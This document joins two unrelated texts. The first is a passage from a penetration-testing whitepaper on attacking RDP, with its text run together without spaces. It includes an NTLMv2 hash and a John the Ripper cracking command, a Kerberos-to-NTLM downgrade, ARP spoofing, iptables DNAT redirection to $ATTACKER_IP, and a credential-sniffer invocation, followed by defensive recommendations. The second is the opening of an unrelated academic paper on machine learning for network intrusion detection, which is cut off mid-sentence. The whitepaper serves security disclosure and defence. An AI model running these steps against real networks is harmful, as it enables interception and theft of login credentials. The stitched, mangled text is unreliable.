30000001C0: 0030002E003100370039000000000000.0...1.7.9......
31000001D0: 0000000000000019 0A F7 ED 0C 45 C0 80 73 ........ ....E..s
32000001E0: 53 74 1A AB AF 13 B4 A3 81 9F 04 81 9C 01 00 00 St..............
33000001F0: 00 7F 38 FE A6 32 5E 4E 57 00 00 00 00 42 B4 6E ..8..2^NW....B.n
3400000200: 39 09 AA CC 8F 04 71 5C 54 CF AD E0 A0 58 AA 06 9.....q\T....X..
3500000210: B2 F0 0A 33 05 03 54 60 FB E1 68 FC F5 0D A9 C0 ...3..T`..h.....
3600000220: D9 57 BA 43 F2 92 F7 6F 32 74 4E 86 CD 7F F0 3B .W.C...o2tN....;
3700000230: DD A4 A4 67 0A B7 7E 64 0B 63 D7 4B F7 C6 B7 8F ...g..~d.c.K....
3800000240: 21 15 9D EA 3E E1 1A 50 AB AA D3 6E 46 9D 68 6E !...>..P...nF.hn
3900000250: 2A EA 44 5C E0 51 1D 41 B4 13 EB B9 90 E8 75 AD *.D\.Q.A......u.
4000000260: A0 99 4E F2 A5 99 D4 8D 2A 11 73 F1 95 FC 7E A0 ..N.....*.s...~.
4100000270: 06 FD 13 DB D0 3B 7A B4 41 97 B6 94 D4 11 62 F5 .....;z.A.....b.
4200000280: 4C 06 BE 03 9C 0F 55 0E 3C L.....U.&lt;
IhighlightedtheClientChallengeandNTLMresponse. Botharerightnexttoeachother. TheServerChallenge
wasinthepreviousmessagefromtheserver.
WhatwearelookingathereisNTLMauthentication[ 15]. Itisachallenge-responsetechniquewherethe
clientmapsaServerChallenge(similartotheServerRandomfromearlier),aClientChallenge,andthehashof
theuser’spasswordtogetherwithsomeothervaluesontoacryptographichashvalue. Thisvalue,calledthe
“NTLMresponse”,isthentransmittedtotheserver.
Thedetailsofhowthisvalueiscomputedarenotimportanttous. Theonlythingweneedtoknowisthatit
cannotbereplayedorusedforpass-the-hashattacks. Butitcanbesubjectedtopasswordguessingattacks!
TheunderlyinghashalgorithmisHMAC-MD5, whichisafairlycheaphashalgorithm(sowecandomany
guessespersecond)butitisalsousingasalt(whichrulesoutrainbowtables).
We can now try to crack it with Hashcat [ 17] or John The Ripper [ 18]. The format of the hash for John is
this[16]:
1<Username>::<Domain>:<ServerChallenge>:<ClientChallenge>:<NTLMResponse>
Soinourcasewewouldhave:
User1::RD14:a5f46f6489dc654f:110d658e927f077b0402040cc1a6b6ef:0101000000000
000d5fda87cec95d201a7559d44f431848a0000000002000800520044003100340001000800
44004300300031000400140072006400310034002e006c006f00630061006c0003001e00640
06300300031002e0072006400310034002e006c006f00630061006c00050014007200640031
0034002e006c006f00630061006c0007000800d5fda87cec95d201060004000200000008003
000300000000000000000000000002000004cfa6e96109bd90f6a4080daaa8e264e4ebfaffa
e9e368af787f53e389d96b180a0010000000000000000000000000000000000009002c00540
0450052004d005300520056002f003100390032002e003100360038002e00340030002e0031
0037003900000000000000000000000000
Ifweputthishashinafilecalled hashes.txt ,thiscommandwillverifythatwegotitright:
Vollmer| AttackingRDP 15
1$ echo 'S00perS3cretPa$$word' | ./john --format=netntlmv2 --stdin hashes.txt
2Using default input encoding: UTF-8
3Loaded 1 password hash (netntlmv2, NTLMv2 C/R [MD4 HMAC-MD5 32/64])
4Will run 8 OpenMP threads
5Press Ctrl-C to abort, or send SIGUSR1 to john process for status
6S00perS3cretPa$$word(User1)
71g 0:00:00:00 33.33g/s 33.33p/s 33.33c/s 33.33C/s S00perS3cretPa$$word
8Use the "--show" option to display all of the cracked passwords reliably
9Session completed
Sothisisbetterthannothing. Butwecandobetter.
Thequestionweneedtoaskourselvesis: HowdoestheserververifytheNTLMresponse? Itasksthedomain
controller. Whatifthedomaincontrollerisnotavailable? Itsays“screwit,letusdoenhancedRDPsecurity
instead of NLA”, and the client will comply. And the kicker is: Since the client already cached the user’s
password,itwillsimplytransmititinsteadofdirectingtheusertotheWindowsloginscreen! Thatisprecisely
whatwewanted. ExceptfortheSSLwarning(whichthevictimmightbeusedtoanyway),nothingsuspicious
willhappenatall.
Sowhatwedoisthis: AftertheclientsendsitsNTLMresponse,wewillreplacetheserver’sanswerwiththis:
100000000: 300d a003 0201 04a4 0602 04c0 0000 5e 0.............^
Icouldn’tfinddocumentationonthisanywhere(ifyoudid,pleasewritemeane-mail),butthisiswhatthe
serverrespondswithifitcannottcontactthedomaincontroller. TheclientwillfallbacktoenhancedRDP
security,showtheSSLwarning,andtransmitthepasswordinsidetheSSLtunneltotheserver.
Asasideremark,notethatwedidnotgetanSSLwarning. Accordingtothespecifications[ 19],theclientwill
sendtheSSLcertificate’sfingerprinttotheserverencryptedwiththekeynegotiatedbytheCredSSPprotocol.
Ifitdoesnotmatchthefingerprintoftheserver’scertificate,thesessionisterminated. Thatisthereasonwhy
theaboveworksifthevictimprovidesincorrectcredentials–weareabletoseethe(incorrect)password.
However,ifthepasswordiscorrect,wewillobserveaTLSinternalerror.
A workaround that I came up with was to simply tamper with the NTLM response. I changed the Python
scriptsothattheNTLMauthenticationwillalwaysfailbychangingtheNTLMresponse. Ourvictimwon’t
notice,becauseaswejustsaw,wecandowngradetheconnectiontoTLS,afterwhichthecredentialswillbe
retransmitted.
However,thereisonemorethingweneedtotakeintoaccount. Iftheclientcantellthatyouaretryingto
connecttoadomain-joinedcomputer,itwillnotuseNTLM.ItwillwanttouseKerberos,whichmeansitwill
contactthedomaincontrollerbeforeestablishingtheRDPconnectiontorequestaticket. That’sagoodthing,
becauseaKerberosticketisevenmoreuselesstoanattackerthanasaltedNTLMresponse. Butiftheattacker
isinaMitMposition,hecouldblockallrequeststotheKerberosservice. Andguesswhathappensiftheclient
cannotcontacttheKerberosservice? Exactly,itwillfallbacktoNTLM.

16 Vollmer|AttackingRDP
Weaponizingthisattack
Therestissimplyafingerexercise. Untilnow,wehavebeendealingwithalabenvironment. Thevictimwon’t
beenteringourIPintheRDPclient,itwillbeenteringtheIPorthehostnameoftheirownserver. Therearea
numberofwaystogainaMitMposition,butherewewillchooseARPspoofing. Itiseasyenoughtodofora
momenttodemonstratethisasaproof-of-concept. Sinceitisalayer-2attack,wedoneedtobeonthesame
subnetasourvictim,though.
AfterwespoofedtheARPrepliesandenabledforwardingofIPv4traffic,allcommunicationsbetweenthe
victim and the gateway will run through our machine. Since we still don’t know the IP address the victim
entered,wecan’trunourPythonscriptyet.
First, we create an iptables rule that rejects SYN packets coming from the victim intended for an RDP
server:
1$ iptables -A FORWARD -p tcp -s "$VICTIM_IP" --syn --dport 3389 -j REJECT
Wewouldn’twanttoredirectanyothertrafficyet,sincethevictimmightbeusinganestablishedRDPconnection
already,whichwouldgetdisruptedotherwise. Ifwewouldn’trejectthosepacketshere,thevictimwould
actuallyestablishaconnectionwiththegenuinehost,whilewewantthemtoconnecttousinstead.
Second,wewaitforaTCPSYNpacketwithdestinationport3389fromthevictiminordertolearntheaddress
oftheoriginaldestinationhost. Weuse tcpdump forthis:
1$ tcpdump -n -c 1 -i "$IFACE" src host "$VICTIM_IP" and \
2"tcp[tcpflags] & tcp-syn != 0" and \
3dst port 3389 2> /dev/null | \
4sed -e 's/.*> \([0-9.]*\)\.3389:.*/\1/'
The-c 1optionstells tcpdump toexitafterthefirstmatchingpacket. ThisSYNpacketwillbelost,butthat
doesn’treallymatter,itwillonlybeashortwhilebeforethevictim’ssystemwilltryagain.
Third,wewillretrievetheSSLcertificateoftheRDPserverandcreateanewself-signedcertificatethathas
thesamecommonnameastheoriginalcertificate. Wecouldalsofixthecertificate’sexpirationdate,andit
willbeliterallyindistinguishablefromtheoriginalunlessyoutakealong,hardlookatitsfingerprint. Iwrotea
smallBashscript[ 23]todothejobforus.
Nowweremovethe iptables rulefromearlierandredirect allTCPtrafficcomingfromthevictimdestined
forthegenuineRDPhosttoourIPaddress:
1$ iptables -t nat -A PREROUTING -p tcp -d "$ORIGINAL_DEST" \
2-s "$VICTIM_IP" --dport 3389 -j DNAT --to-destination "$ATTACKER_IP"
To enforce the downgrade from Kerberos to NTLM, we block all TCP traffic originating from the victim to
destinationport88:
Vollmer| AttackingRDP 17
1$ iptables -A INPUT -p tcp -s "$VICTIM_IP" --dport 88 \
2-j REJECT --reject-with tcp-reset
AtthispointwehavealltheinformationweneedtorunourPythonscript:
1$ rdp-cred-sniffer.py -c "$CERTPATH" -k "$KEYPATH" "$ORIGINAL_DEST"
Figure6:Finally! Ontheleft: Thevictim’sviewofaRDPsessiontothedomaincontroller. Ontheright: The
attacker’sviewoftheplaintextpassword. (PleasechooseabetterpasswordthanIdidformytest
setup.)

18 Vollmer|AttackingRDP
Recommendations
Nowyouareprobablywonderingwhatyou,asasystemadministrator,candoaboutallofthistokeepyour
networksecure.
Firstofall,itisabsolutelycriticalthatRDPconnectionscannothappeniftheserver’sidentitycannotbeverified,
i.e.iftheSSLcertificateisnotsignedbyatrustedcertificateauthority(CA).You mustsignallservercertificates
withyourenterpriseCA.Clients mustbeconfiguredviaGPO[ 22]todisallowconnectionsifthecertificate
cannotbevalidated:
Computerconfiguration →Policies →AdministrativeTemplates →WindowsComponents →RemoteDesktop
Services(orTerminalServices) →RemoteDesktopConnectionClient →Configureserverauthenticationfor
client
ThequestionofwhethertoenforceCredSSP(NLA)ontheserversideistricky. Fortherecord,thiscanalsobe
rolledoutasagrouppolicy[ 20]:
[Sameasabove] →RemoteDesktopSessionHost(orTerminalServer) →Security →Requireuserauthenti-
cationforremoteconnectionsbyusingNetworkLevelAuthentication
Sincewehaveseenthattheclientcachestheuser’scredentialsincaseNLAisnotpossibleandconveniently
re-transmitthem,weknowthatthesecredentialsareinmemory. Thus,theycanbereadbyanattackerwith
SYSTEMprivileges,forinstanceusingMimikatz[ 24]. ThisisanincrediblycommonscenariothatwefromSySS
seeinourcustomers’network: compromiseonemachine,extractcleartextcredentialsofloggedonuserswith
Mimikatz,andmoveonlaterallywiththenewlycompromisedaccountuntilyoufindadomainadministrator
password. Thatiswhyyoushouldonlyuseyourpersonalizeddomainadministratoraccountonthedomain
controllerandnowhereelse.
But if using RDP to remote into the domain controller leaves traces of a highly privileged account on a
workstation,thisisaseriousproblem. Besides,ifyouenforceNLA,userswhoonlyworkonaterminalserver
willbelockedoutif“Usermustchangepasswordatnextlogon”isenabled. Asfaraswecantell,theonly
advantagesofNLAarethatitismoreconvenient,canmitigatedenial-of-serviceattackssinceitusesless
resourcesandthatitcanprotectfromnetwork-basedattacksonRDPsuchasMS12-020[ 25]. Thatiswhywe
atSySSarecurrentlydebatingwhethertorecommendtodisableNLAforRDP.
IncaseyouwanttorefrainfromusingNLA,setthegrouppolicy“Requireuseofspecificsecuritylayerfor
remoteconnections”toSSL[ 20].
AnothermeasureyoucantaketofurtherincreasethesecurityofRDPconnectionsistwouseasecondfactor
besidesusercredentials. Therearethirdpartyproductsforthisthatyoumaywanttolookinto,atleastto
securecriticalsystemssuchasthedomaincontrollers.
IncaseyouhaveLinuxmachinesconnectingtoWindowsTerminalServersviaRDP,Ishouldmentionherethat
thepopularRDPclient rdesktop isnotcapableofNLAanddoesnotvalidateSSLcertificatesatall. One
alternative, xfreerdp ,doesatleastvalidatethecertificate.
Lastly,youareencouragedtoeducateyourcolleaguesandusersthatSSLwarningsarenottobetakenlightly,
whetheritisinthecontextofRDPorHTTPSoranythingelse. Astheadministrator,youareresponsiblefor
makingsurethatyourclientsystemshaveyourrootCAintheirlistoftrustedCAs. Thisway,thesewarnings
shouldbetheexceptionratherthantheruleandwarrantacalltotheITdepartment.
Ifyouhaveanymorequestionsorcomments,justletmeknow.
Vollmer| AttackingRDP 19
Figure7:AcrucialGPOsetting: Configureserverauthenticationforclient

20 Vollmer|AttackingRDP
References
[1]Vollmer, A., Github.com: Seth (2017), https://github.com/SySS-Research/Seth (Cited on
page2.)
[2]MontoroM.,Cain&Abel(2014), http://www.oxid.it/cain.html (Citedonpage 2.)
[3]Wikipediacontributors,Finitegroup, https://en.wikipedia.org/w/index.php?title=Finit
e_group&oldid=768290355 (accessedMarch8,2017) (Citedonpage 5.)
[4]Wikipediacontributors,Shor’salgorithm(accessedMarch8,2017), https://en.wikipedia.org/w
/index.php?title=Shor%27s_algorithm&oldid=767553912 (Citedonpage 5.)
[5]Shor,P.W.,Polynomial-TimeAlgorithmsforPrimeFactorizationandDiscreteLogarithmsonaQuantum
Computer(1995), https://arxiv.org/abs/quant-ph/9508027v2 (Citedonpage 5.)
[6]MicrosoftDeveloperNetwork,[MS-RDPBCGR]:Non-FIPS(2017), https://msdn.microsoft.com/e
n-us/library/cc240785.aspx (Citedonpages 6and9.)
[7]Schneier,B.,WhyCryptographyIsHarderThanItLooks(1997), https://www.schneier.com/essay
s/archives/1997/01/why_cryptography_is.html (Citedonpage 6.)
[8]MicrosoftDeveloperNetwork,[MS-RDPBCGR]:TerminalServicesSigningKey(2017), https://msdn.m
icrosoft.com/en-us/library/cc240776.aspx (Citedonpages 6and8.)
[9]Microsoft Developer Network, [MS-RDPBCGR]: Encrypting and Decrypting the I/O Data Stream (2017),
https://msdn.microsoft.com/en-us/library/cc240787.aspx (Citedonpage 6.)
[10]MicrosoftDeveloperNetwork,[MS-RDPBCGR]:ServerSecurityData(TS_UD_SC_SEC1)(2017), https:
//msdn.microsoft.com/en-us/library/cc240518.aspx (Citedonpage 7.)
[11]MicrosoftDeveloperNetwork,[MS-RDPBCGR]:SigningaProprietaryCertificate(2017), https://msdn
.microsoft.com/en-us/library/cc240778.aspx (Citedonpage 8.)
[12]Microsoft Developer Network, [MS-RDPBCGR]: Client Input Event PDU Data (TS_INPUT_PDU_DATA)
(2017),https://msdn.microsoft.com/en-us/library/cc746160.aspx (Citedonpage 10.)
[13]MicrosoftDeveloperNetwork,[MS-RDPBCGR]:KeyboardEvent(TS_KEYBOARD_EVENT)(2017), https:
//msdn.microsoft.com/en-us/library/cc240584.aspx (Citedonpage 11.)
[14]Brouwer,A.,KeyboardScancodes(2009), https://www.win.tue.nl/~aeb/linux/kbd/scanc
odes-10.html#ss10.6 (Citedonpage 11.)
[15]MicrosoftDeveloperNetwork,MicrosoftNTLM(2017), https://msdn.microsoft.com/en-us/l
ibrary/aa378749%28VS.85%29.aspx (Citedonpage 14.)
[16]Weeks,M.,AttackingWindowsFallbackAuthentication(2015), https://www.root9b.com/sites
/default/files/whitepapers/R9B_blog_003_whitepaper_01.pdf (Citedonpage 14.)
[17]Hashcat,https://hashcat.net/hashcat/ (Citedonpage 14.)
[18]JohnTheRipper, http://www.openwall.com/john/ (Citedonpage 14.)
[19]MicrosoftDeveloperNetwork,[MS-CSSP]:TSRequest(2017), https://msdn.microsoft.com/en-
us/library/cc226780.aspx (Citedonpage 15.)
Vollmer| AttackingRDP 21
[20]MicrosoftTechnet,Security(2017), https://technet.microsoft.com/en-us/library/cc7
71869(v=ws.10).aspx (Citedonpage 18.)
[21]MicrosoftTechnet,NetworkSecurity: RestrictNTLM:NTLMauthenticationinthisdomain(2017), https:
//technet.microsoft.com/en-us/library/jj852241(v=ws.11).aspx (Notcited.)
[22]MicrosoftTechnet,RemoteDesktopConnectionClient(2017), https://technet.microsoft.com/
en-us/library/cc753945(v=ws.10).aspx (Citedonpage 18.)
[23]Vollmer, A., Github.com: clone-cert.sh (2017), https://github.com/SySS-Research/clone-
cert(Citedonpage 16.)
[24]Delpy,B.,Github.com: mimikatz(2017), https://github.com/gentilkiwi/mimikatz (Citedon
page18.)
[25]Microsoft Technet, Security Bulletin MS12-020 (2012), https://technet.microsoft.com/en-
us/library/security/ms12-020.aspx (Citedonpage 18.)

SySS GmbH   72072 Tübingen   Germany   +49 (0)7071 - 40 78 56-0   info@syss.deTHE PENTEST EXPERTS
WWW.SYSS.DEOutside the Closed World:
On Using Machine Learning For Network Intrusion Detection
Robin Sommer
International Computer Science Institute, and
Lawrence Berkeley National LaboratoryVern Paxson
International Computer Science Institute, and
University of California, Berkeley
Abstract —In network intrusion detection research, one pop-
ular strategy for finding attacks is monitoring a network’s
activity for anomalies : deviations from profiles of normality
previously learned from benign traffic, typically identifie d
using tools borrowed from the machine learning community.
However, despite extensive academic research one finds a
striking gap in terms of actual deployments of such systems:
compared with other intrusion detection approaches, machi ne
learning is rarely employed in operational “real world” set tings.
We examine the differences between the network intrusion
detection problem and other areas where machine learning
regularly finds much more success. Our main claim is that
the task of finding attacks is fundamentally different from
these other applications, making it significantly harder fo r the
intrusion detection community to employ machine learning
effectively. We support this claim by identifying challeng es
particular to network intrusion detection, and provide a se t
of guidelines meant to strengthen future research on anomal y
detection.
Keywords -anomaly detection; machine learning; intrusion
detection; network security.
I. I NTRODUCTION
Traditionally, network intrusion detection systems (NIDS )
are broadly classified based on the style of detection they ar e
using: systems relying on misuse-detection monitor activity
with precise descriptions of known malicious behavior, whi le
anomaly-detection systems have a notion of normal activity
and flag deviations from that profile.1Both approaches have
been extensively studied by the research community for
many years. However, in terms of actual deployments, we
observe a striking imbalance: in operational settings, of
these two main classes we find almost exclusively only
misuse detectors in use—most commonly in the form of
signature systems that scan network traffic for characteris tic
byte sequences.
This situation is somewhat striking when considering
the success that machine-learning—which frequently forms
the basis for anomaly-detection—sees in many other areas
of computer science, where it often results in large-scale
1Other styles include specification-based [1] and behavioral detec-
tion [2]. These approaches focus respectively on defining al lowed types
of activity in order to flag any other activity as forbidden, a nd analyzing
patterns of activity and surrounding context to find seconda ry evidence of
attacks.deployments in the commercial world. Examples from other
domains include product recommendations systems such
as used by Amazon [3] and Netflix [4]; optical character
recognition systems (e.g., [5], [6]); natural language tra ns-
lation [7]; and also spam detection, as an example closer to
home [8].
In this paper we set out to examine the differences
between the intrusion detection domain and other areas
where machine learning is used with more success. Our main
claim is that the task of finding attacks is fundamentally
different from other applications, making it significantly
harder for the intrusion detection community to employ
machine learning effectively. We believe that a significant
part of the problem already originates in the premise, found
in virtually any relevant textbook, that anomaly detection is
suitable for finding novel attacks; we argue that this premise
does not hold with the generality commonly implied. Rather,
the strength of machine-learning tools is finding activity
that is similar to something previously seen , without the
need however to precisely describe that activity up front (a s
misuse detection must).
In addition, we identify further characteristics that our d o-
main exhibits that are not well aligned with the requirement s
of machine-learning. These include: (i)a very high cost of
errors; (ii)lack of training data; (iii)a semantic gap between
results and their operational interpretation; (iv) enormous
variability in input data; and (v)fundamental difficulties
for conducting sound evaluation. While these challenges
may not be surprising for those who have been working
in the domain for some time, they can be easily lost on
newcomers. To address them, we deem it crucial for any
effective deployment to acquire deep, semantic insight into
a system’s capabilities and limitations, rather than treat ing
the system as a black box as unfortunately often seen.
We stress that we do notconsider machine-learning an
inappropriate tool for intrusion detection. Its use requir es
care, however: the more crisply one can define the context
in which it operates, the better promise the results may hold .
Likewise, the better we understand the semantics of the
detection process, the more operationally relevant the sys tem
will be. Consequently, we also present a set of guidelines
meant to strengthen future intrusion detection research.
Throughout the discussion, we frame our mindset around
on the goal of using an anomaly detection system effec-
tively in the “real world”, i.e., in large-scale, operation al
environments. We focus on network intrusion detection as
that is our main area of expertise, though we believe that
similar arguments hold for host-based systems. For ease of
exposition we will use the term anomaly detection somewhat
narrowly to refer to detection approaches that rely primari ly
on machine-learning. By “machine-learning” we mean algo-
rithms that are first trained with reference input to “learn”
its specifics (either supervised or unsupervised), to then b e
deployed on previously unseen input for the actual detectio n
process. While our terminology is deliberately a bit vague,
we believe it captures what many in the field intuitively
associate with the term “anomaly detection”.
We structure the remainder of the paper as follows. In Sec-
tion II, we begin with a brief discussion of machine learning
as it has been applied to intrusion detection in the past. We
then in Section III identify the specific challenges machine
learning faces in our domain. In Section IV we present
recommendations that we hope will help to strengthen future
research, and we briefly summarize in Section V.
II. M ACHINE LEARNING IN INTRUSION DETECTION
Anomaly detection systems find deviations from expected
behavior . Based on a notion of normal activity, they report
deviations from that profile as alerts. The basic assumption
underlying any anomaly detection system—malicious activ-
ity exhibits characteristics not observed for normal usage —
was first introduced by Denning in her seminal work on
the host-based IDES system [9] in 1987. To capture normal
activity, IDES (and its successor NIDES [10]) used a com-
bination of statistical metrics and profiles. Since then, ma ny
more approaches have been pursued. Often, they borrow
schemes from the machine learning community, such as
information theory [11], neural networks [12], support vec tor
machines [13], genetic algorithms [14], artificial immune-
systems [15], and many more. In our discussion, we focus on
anomaly detection systems that utilize such machine learni ng
approaches.
Chandola et al. provide a survey of anomaly detection
in [16], including other areas where similar approaches
are used, such as monitoring credit card spending patterns
for fraudulent activity. While in such applications one is
also looking for outliers, the data tends to be much more
structured. For example, the space for representing credit
card transactions is of relatively low dimensionality and s e-
mantically much more well-defined than network traffic [17].
Anomaly detection approaches must grapple with a set of
well-recognized problems [18]: the detectors tend to gener -
ate numerous false positives; attack-free data for trainin g is
hard to find; and attackers can evade detection by gradually
teaching a system to accept malicious activity as benign. Ou r
discussion in this paper aims to develop a different generalpoint: that much of the difficulty with anomaly detection
systems stems from using tools borrowed from the machine
learning community in inappropriate ways.
Compared to the extensive body of research, anomaly
detection has not obtained much traction in the “real world” .
Those systems found in operational deployment are most
commonly based on statistical profiles of heavily aggre-
gated traffic, such as Arbor’s Peakflow [19] and Lanscope’s
StealthWatch [20]. While highly helpful, such devices oper -
ate with a much more specific focus than with the generality
that research papers often envision.2We see this situation
as suggestive that many anomaly detection systems from
the academic world do not live up to the requirements of
operational settings.
III. C HALLENGES OF USING MACHINE LEARNING
It can be surprising at first to realize that despite extensiv e
academic research efforts on anomaly detection, the succes s
of such systems in operational environments has been very
limited. In other domains, the very same machine learning
tools that form the basis of anomaly detection systems have
proven to work with great success, and are regularly used
in commercial settings where large quantities of data rende r
manual inspection infeasible. We believe that this “succes s
discrepancy” arises because the intrusion detection domai n
exhibits particular characteristics that make the effecti ve
deployment of machine learning approaches fundamentally
harder than in many other contexts.
In the following we identify these differences, with an aim
of raising the community’s awareness of the unique chal-
lenges anomaly detection faces when operating on network
traffic. We note that our examples from other domains are
primarily for illustration, as there is of course a continuo us
spectrum for many of the properties discussed (e.g., spam
detection faces a similarly adversarial environment as in-
trusion detection does). We also note that we are network
security researchers, notexperts on machine-learning, and
thus we argue mostly at an intuitive level rather than attemp t-
ing to frame our statements in the formalisms employed
for machine learning. However, based on discussions with
colleagues who work with machine learning on a daily basis,
we believe these intuitive arguments match well with what
a more formal analysis would yield.
A. Outlier Detection
Fundamentally, machine-learning algorithms excel much
better at finding similarities than at identifying activity that
does not belong there: the classic machine learning appli-
cation is a classification problem, rather than discovering
meaningful outliers as required by an anomaly detection
system [21]. Consider product recommendation systems
such as that used by Amazon [3]: it employs collaborative
2We note that for commercial solutions it is always hard to say what
they do exactly , as specifics of their internals are rarely publicly availab le.
filtering , matching each of a user’s purchased (or positively
rated) items with other similar products, where similarity is
determined by products that tend be bought together. If the
system instead operated like an anomaly detection system, i t
would look for items that are typically notbought together—
a different kind of question with a much less clear answer,
as according to [3], many product pairs have no common
customers.
In some sense, outlier detection is also a classification
problem: there are two classes, “normal” and “not normal”,
and the objective is determining which of the two more
likely matches an observation. However, a basic rule of
machine-learning is that one needs to train a system with
specimens of allclasses, and, crucially, the number of
representatives found in the training set for each class should
be large [22]. Yet for anomaly detection aiming to find novel
attacks, by definition one cannot train on the attacks of
interest, but only on normal traffic, and thus having only
one category to compare new activity against.
In other words, one often winds up training an anomaly
detection system with the opposite of what it is supposed
to find—a setting certainly not ideal, as it requires having
aperfect model of normality for any reliable decision. If,
on the other hand, one had a classification problem with
multiple alternatives to choose from, then it would suffice
to have a model just crisp enough to separate the classes. To
quote from Witten et al. [21]: The idea of specifying only
positive examples and adopting a standing assumption that
the rest are negative is called the closed world assumption .
. . . [The assumption] is not of much practical use in real-
life problems because they rarely involve “closed” worlds
in which you can be certain that all cases are covered.
Spam detection is an example from the security domain
of successfully applying machine learning to a classificati on
problem. Originally proposed by Graham [8], Bayesian
frameworks trained with large corpora of both spam and
ham have evolved into a standard tool for reliably identifyi ng
unsolicited mail.
The observation that machine learning works much better
for such true classification problems then leads to the
conclusion that anomaly detection is likely in fact better
suited for finding variations of known attacks , rather than
previously unknown malicious activity. In such settings, o ne
can train the system with specimens of the attacks as they
are known and with normal background traffic, and thus
achieve a much more reliable decision process.
B. High Cost of Errors
In intrusion detection, the relative cost of any misclassi-
fication is extremely high compared to many other machine
learning applications. A false positive requires spending
expensive analyst time examining the reported incident onl y
to eventually determine that it reflects benign underlying
activity. As argued by Axelsson, even a very small rate offalse positives can quickly render an NIDS unusable [23].
False negatives, on the other hand, have the potential to
cause serious damage to an organization: even a single
compromised system can seriously undermine the integrity
of the IT infrastructure. It is illuminating to compare such
high costs with the impact of misclassifications in other
domains:
•Product recommendation systems can readily tolerate
errors as these do not have a direct negative impact.
While for the seller a good recommendation has the
potential to increase sales, a bad choice rarely hurts
beyond a lost opportunity to have made a more enticing
recommendation. (In fact, one might imagine such
systems deliberately making more unlikely guesses
on occasion, with the hope of pointing customers to
products they would not have otherwise considered.) If
recommendations do not align well with the customers’
interest, they will most likely just continue shopping,
rather than take a damaging step such as switching
to different seller. As Greg Linden said (author of the
recommendation engine behind Amazon): “Recommen-
dations involve a lot of guesswork. Our error rate will
always be high.” [24]
•OCR technology can likewise tolerate errors much more
readily than an anomaly detection system. Spelling and
grammar checkers are commonly employed to clean up
results, weeding out the obvious mistakes. More gener-
ally, statistical language models associate probabilitie s
with results, allowing for postprocessing of a system’s
initial output [25]. In addition, users have been trained
not to expected perfect documents but to proofread
where accuracy is important. While this corresponds to
verifying NIDS alerts manually, it is much quicker for a
human eye to check spelling of a word than to validate
a report of, say, a web server compromise. Similar
to OCR, contemporary automated language translation
operates at relatively large errors rates [7], and while
recent progress has been impressive, nobody would
expect more than a rough translation.
•Spam detection faces a highly unbalanced cost model:
false positives (i.e., ham declared as spam) can prove
very expensive, but false negatives (spam not identi-
fied as such) do not have a significant impact. This
discrepancy can allow for “lopsided” tuning, leading
to systems that emphasize finding obvious spam fairly
reliably, yet exhibiting less reliability for new variatio ns
hitherto unseen. For an anomaly detection system that
primarily aims to find novel attacks, such performance
on new variations rarely constitutes an appropriate
trade-off.
Overall, an anomaly detection system faces a much more
stringent limit on the number of errors that it can tolerate.
However, the intrusion detection-specific challenges that we
discuss here all tend to increase error rates—even above
the levels for other domains. We deem this unfortunate
combination as the primary reason for the lack of success
in operational settings.
C. Semantic Gap
Anomaly detection systems face a key challenge of trans-
ferring their results into actionable reports for the network
operator. In many studies, we observe a lack of this crucial
final step, which we term the semantic gap . Unfortunately,
in the intrusion detection community we find a tendency
to limit the evaluation of anomaly detection systems to
an assessment of a system’s capability to reliably identify
deviations from the normal profile. While doing so indeed
comprises an important ingredient for a sound study, the nex t
step then needs to interpret the results from an operator’s
point of view—“What does it mean ?”
Answering this question goes to the heart of the difference
between finding “abnormal activity” and “attacks”. Those
familiar with anomaly detection are usually the first to
acknowledge that such systems are nottargeting to identify
malicious behavior but just report what has not been seen
before, whether benign or not. We argue however that
one cannot stop at that point. After all, the objective of
deploying an intrusion detection system isto find attacks,
and thus a detector that does not allow for bridging this gap
is unlikely to meet operational expectations. The common
experience with anomaly detection systems producing too
many false positives supports this view: by definition, a
machine learning algorithm does not make any mistakes
within its model of normality; yet for the operator it is the
results’ interpretation that matters.
When addressing the semantic gap, one consideration is
the incorporation of local security policies. While often
neglected in academic research, a fundamental observation
about operational networks is the degree to which they
differ : many security constraints are a site-specific property.
Activity that is fine in an academic setting can be banned in
an enterprise network; and even inside a single organizatio n,
department policies can differ widely. Thus, it is crucial f or
a NIDS to accommodate such differences.
For an anomaly detection system, the natural strategy
to address site-specifics is having the system “learn” them
during training with normal traffic. However, one cannot
simply assert this as the solution to the question of adaptin g
to different sites; one needs to explicitly demonstrate it, since
the core issue concerns that such variations can prove diver se
and easy to overlook.
Unfortunately, more often than not security policies are
not defined crisply on a technical level. For example, an
environment might tolerate peer-to-peer traffic as long as
it is not used for distributing inappropriate content, and
that it remains “below the radar” in terms of volume. Toreport a violation of such a policy, the anomaly detection
system would need to have a notion of what is deemed
“appropriate” or “egregiously large” in that particular envi-
ronment ; a decision out of reach for any of today’s systems.
Reporting just the usage of P2P applications is likely not
particularly useful, unless the environment flat-out bans s uch
usage. In our experience, such vague guidelines are actuall y
common in many environments, and sometimes originate in
the imprecise legal language found in the “terms of service”
to which users must agree [26].
The basic challenge with regard to the semantic gap
is understanding how the features the anomaly detection
system operates on relate to the semantics of the network
environment. In particular, for any given choice of feature s
there will be a fundamental limit to the kind of determina-
tions a NIDS can develop from them. Returning to the P2P
example, when examining only NetFlow records, it is hard
to imagine how one might spot inappropriate content.3As
another example, consider exfiltration of personally ident i-
fying information (PII). In many threat models, loss of PII
ranks quite high, as it has the potential for causing major
damage (either directly, in financial terms, or due to public ity
or political fallout). On a technical level, some forms of PI I
are not that hard to describe; e.g., social security numbers as
well bank account numbers follow specific schemes that one
can verify automatically.4But an anomaly detection system
developed in the absence of such descriptions has little hop e
of finding PII, and even given examples of PII and non-
PII will likely have difficulty distilling rules for accurat ely
distinguishing one from the other.
D. Diversity of Network Traffic
Network traffic often exhibits much more diversity than
people intuitively expect, which leads to misconceptions
about what anomaly detection technology can realistically
achieve in operational environments. Even within a single
network, the network’s most basic characteristics—such as
bandwidth, duration of connections, and application mix—
can exhibit immense variability, rendering them unpre-
dictable over short time intervals (seconds to hours). The
3We note that in fact the literature holds some fairly amazing demon-
strations of how much more information a dataset can provide than what
we might intuitively expect: Wright et al. [27] infer the lan guage spoken
onencrypted VOIP sessions; Yen et al. [28] identify the particular web
browser a client uses from flow-level data; Narayanan et al. [ 29] identify
users in the anonymized Netflix datasets via correlation wit h their public
reviews in a separate database; and Kumar et al. [30] determi ne from lossy
and remote packet traces the number of disks attached to syst ems infected
by the “Witty” worm, as well as their uptime to millisecond pr ecision.
However these examples all demonstrate the power of exploit ingstructural
knowledge informed by very careful examination of the parti cular domain
of study—results not obtainable by simply expecting an anom aly detection
